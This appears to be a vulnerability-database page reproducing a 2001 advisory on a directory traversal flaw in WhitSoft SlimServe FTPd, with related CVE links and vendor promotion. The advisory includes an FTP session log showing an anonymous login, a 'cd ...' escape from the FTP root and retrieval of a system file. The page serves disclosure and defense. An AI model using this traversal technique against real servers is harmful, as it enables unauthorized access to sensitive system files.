Lucene search
+L

WhitSoft SlimServe ftpd 1.0/2.0 - Directory Traversal

🗓️ 28 Feb 2001 00:00:00Reported by joetestaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Remote users can exploit SlimServe FTPd to access sensitive files via directory traversal.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2001-0454
24 May 200104:00
cve
cvelist
Cvelist
CVE-2001-0454
24 May 200104:00
cvelist
exploitdb
Exploit DB
WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal
4 Mar 200100:00
exploitdb
euvd
EUVD
EUVD-2001-0450
7 Oct 202500:30
euvd
nvd
NVD
CVE-2001-0454
27 Jun 200104:00
nvd
source: https://www.securityfocus.com/bid/2452/info

SlimServ FTPd is a free ftp server distributed and maintained by WhitSoft Development. SlimServe FTPd is designed to offer ftp services to the Microsoft Windows platform.

A problem with the SlimSoft FTP daemon allows remote users to traverse directories outside of the ftp root. Due to the insufficient checking of input, it is possible for a user to escape the ftp root directory by using relative paths. By requesting a directory change of "..." (three dots), it is possible to gain access to the root directory of the partition the ftp server is running on, and potentially gain access to sensitive system files.

Therefore, it is possible for a remote malicious user to gain access to sensitive system files, and potentially gain elevated privileges or privileged information.

% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03431
26